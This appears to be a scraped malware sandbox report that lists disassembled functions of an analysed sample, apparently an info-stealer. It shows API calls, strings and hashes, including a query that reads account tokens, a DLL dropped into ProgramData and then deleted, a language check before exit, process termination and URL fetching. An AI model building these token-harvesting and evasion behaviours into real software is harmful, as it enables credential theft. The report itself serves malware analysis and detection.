Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 8b395c854ddfd5e4dbdcc33a41225ca1b12b47610224f219ae42bdec4a7f0357
Instruction ID: 8cc5c6e92b9177407f415b557039d455fe382619ad6896b8fcb96906e015d8a8
Opcode Fuzzy Hash: 8b395c854ddfd5e4dbdcc33a41225ca1b12b47610224f219ae42bdec4a7f0357
Instruction Fuzzy Hash: 2BB164729101189BCF14FBA0EDA6EEE77B9AF54300F4855B8F50677091EF346A48CB62

Function 00E26A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00E26A14
ExitProcess.KERNEL32 ref: 00E26A45
ExitProcess.KERNEL32 ref: 00E26A4F
ExitProcess.KERNEL32 ref: 00E26A59
ExitProcess.KERNEL32 ref: 00E26A63
ExitProcess.KERNEL32 ref: 00E26A6D

Strings

*, xrefs: 00E26A2C

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: dc8a1204710bba88a4bec6eacfeeddb3f630d1a975247bef181c2afbe3658851
Instruction ID: 41986f05c5ec2ed48afa181a384c9fadf2bac23b8795704514b1d79b8e14da09
Opcode Fuzzy Hash: dc8a1204710bba88a4bec6eacfeeddb3f630d1a975247bef181c2afbe3658851
Instruction Fuzzy Hash: 1EF08270A48309EFD3689FE6E40975CBBB1EF04B07F1142D9F649AE184D67A8A40DB91

Function 00E208A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E29850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E208DC,C:\ProgramData\chrome.dll), ref: 00E29871

Part of subcall function 00E1A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E1A098

StrCmpCA.SHLWAPI(00000000,00998938), ref: 00E20922
StrCmpCA.SHLWAPI(00000000,009988F8), ref: 00E20B79
StrCmpCA.SHLWAPI(00000000,009988E8), ref: 00E20A0C

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E20C35

Strings

C:\ProgramData\chrome.dll, xrefs: 00E20C30
C:\ProgramData\chrome.dll, xrefs: 00E208CD

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: f7ad21a06effe724034e757aeb55710571a2632e43c77b86fb76149eef51d273
Instruction ID: 9cdb54074340fa3e03ba5a10e83b456264f9966852414128c17f8f48b70e77ad
Opcode Fuzzy Hash: f7ad21a06effe724034e757aeb55710571a2632e43c77b86fb76149eef51d273
Instruction Fuzzy Hash: D9A178717002089FCB28EF64D996EED77B6FF94300F54956DE40A6F282DA30DA05CB92

Function 00E8F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E8FA1F
___except_validate_context_record.LIBVCRUNTIME ref: 00E8FA27
_ValidateLocalCookies.LIBCMT ref: 00E8FAB0
__IsNonwritableInCurrentImage.LIBCMT ref: 00E8FADB
_ValidateLocalCookies.LIBCMT ref: 00E8FB30

Strings

csm, xrefs: 00E8FAC5

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction ID: 3faec2afec08ec159764400bdc476d7a67b32e84aa91ff90d55b18ec48304992
Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
Instruction Fuzzy Hash: 70419531A00119EFCF14EF68C884A9D7BF5BF45324F1491A5E81CBB352D7319905CB91

Function 00E15000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1501A
RtlAllocateHeap.NTDLL(00000000), ref: 00E15021
InternetOpenA.WININET(00E30DE3,00000000,00000000,00000000,00000000), ref: 00E1503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E15061
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E15091
InternetCloseHandle.WININET(?), ref: 00E15109
InternetCloseHandle.WININET(?), ref: 00E15116

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4c277f8ee4f15169c3191187ee28355e87fed2beedfe457314595187e88c1898
Instruction ID: 8f1578b0f1df22e5bd7a69bd0fe561c2b6c2201b111de4d6404d86ac1295f2bd
Opcode Fuzzy Hash: 4c277f8ee4f15169c3191187ee28355e87fed2beedfe457314595187e88c1898
Instruction Fuzzy Hash: 1B3116B5A40218EBDB24CF94DC85BDDB7B5AB48704F5081D8FA09B7280C7756EC58F98

Function 00E2856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E285B6
wsprintfA.USER32 ref: 00E285E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2860B
RegCloseKey.ADVAPI32(00000000), ref: 00E2861C
RegCloseKey.ADVAPI32(00000000), ref: 00E28629

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

RegQueryValueExA.ADVAPI32(00000000,0099F1A0,00000000,000F003F,?,00000400), ref: 00E2867C
lstrlen.KERNEL32(?), ref: 00E28691
RegQueryValueExA.ADVAPI32(00000000,0099F050,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E30B3C), ref: 00E28729
RegCloseKey.ADVAPI32(00000000), ref: 00E28798
RegCloseKey.ADVAPI32(00000000), ref: 00E287AA

Strings

%s\%s, xrefs: 00E285DD

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: b5ba04e7fea3352875499f12596404c3b685652bad992298427d28d32a5fab1c
Instruction ID: 4533d1112960dc0393dfb2759d3831de9174b72d039bbc80480c9f7a45d01832
Opcode Fuzzy Hash: b5ba04e7fea3352875499f12596404c3b685652bad992298427d28d32a5fab1c
Instruction Fuzzy Hash: F8214C71A0122CABDB24DB54DC85FE9B3B8FB48704F0081D9F249A6180DF75AA85CFD4

Function 00E299A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E299C5
Process32First.KERNEL32(00E1A056,00000128), ref: 00E299D9
Process32Next.KERNEL32(00E1A056,00000128), ref: 00E299F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E29A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29A6C
CloseHandle.KERNEL32(00000000), ref: 00E29A79
CloseHandle.KERNEL32(00E1A056), ref: 00E29A88

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: e1f7c7c229fa835fdda28a318da8a8cee48d5055c0594dbb69b48ee96217ffc8
Instruction ID: 052b344ce212fa61e996e40ea48d95a0f8f04cbaf130e9eda27523d195ee89c9
Opcode Fuzzy Hash: e1f7c7c229fa835fdda28a318da8a8cee48d5055c0594dbb69b48ee96217ffc8
Instruction Fuzzy Hash: 7921FFB1900318EBDB35DF66E888BDDB7B5BB48704F1051C8E509AA284D7799E84CF90

Function 00E27820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27834
RtlAllocateHeap.NTDLL(00000000), ref: 00E2783B
RegOpenKeyExA.ADVAPI32(80000002,0098BC68,00000000,00020119,00000000), ref: 00E2786D
RegQueryValueExA.ADVAPI32(00000000,0099F098,00000000,00000000,?,000000FF), ref: 00E2788E
RegCloseKey.ADVAPI32(00000000), ref: 00E27898

Strings

Windows 11, xrefs: 00E2784D

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 6bbfdac815c98a84553f7411b22e5193b4e0e7a6d21bd6d917ca3870052abdfd
Instruction ID: faacbc89e7c15e6979b50c281e576c8f1d6da9092033e00dfaf2741eb9895fcd
Opcode Fuzzy Hash: 6bbfdac815c98a84553f7411b22e5193b4e0e7a6d21bd6d917ca3870052abdfd
Instruction Fuzzy Hash: 52016775E44315FBE714DBD5ED49F6D77B8EB44B00F004098FA84AB284D7759940CB90

Function 00E29470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E23D3E,?), ref: 00E2948C
GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E294A9
CloseHandle.KERNEL32(000000FF), ref: 00E294B7

Strings

>=, xrefs: 00E294A1, 00E294CD, 00E294A4
>=, xrefs: 00E29488, 00E2948B

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=$>=
API String ID: 1378416451-3543398223
Opcode ID: bf0b656c9b5bbfbd7eeb04f7bb61d8264c52be36c4c606679ecec545ca2a6114
Instruction ID: fa2cac9e173a32a6220d350068ffffc4cefa9d8e1393c58aac9e3368aeaffc38
Opcode Fuzzy Hash: bf0b656c9b5bbfbd7eeb04f7bb61d8264c52be36c4c606679ecec545ca2a6114
Instruction Fuzzy Hash: 7FF0A438E00308BBDB20DFB5EC88F9E77BAAB48704F10D594FA51AB184D67596018B80

Function 00E24300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00E24325
RegOpenKeyExA.ADVAPI32(80000001,0099E748,00000000,00020119,?), ref: 00E24344
RegQueryValueExA.ADVAPI32(?,0099F3C8,00000000,00000000,00000000,000000FF), ref: 00E24368
RegCloseKey.ADVAPI32(?), ref: 00E24372
lstrcat.KERNEL32(?,00000000), ref: 00E24397
lstrcat.KERNEL32(?,0099F2F0), ref: 00E243AB

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 7f25e476a3196d8b4a1ed067fc48848c4c3aa01128c1fc71b2038c08efb45a59
Instruction ID: 784819ca7ffc47cb1e2e5069e392ea31f402f9509c987a44e8d254a05cc9e4de
Opcode Fuzzy Hash: 7f25e476a3196d8b4a1ed067fc48848c4c3aa01128c1fc71b2038c08efb45a59
Instruction Fuzzy Hash: 8841CBB69001086BDF24EBA0FC46FEE73BDAB98700F00459CB7565A1C5EE7656C88BD1

Function 00E1A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
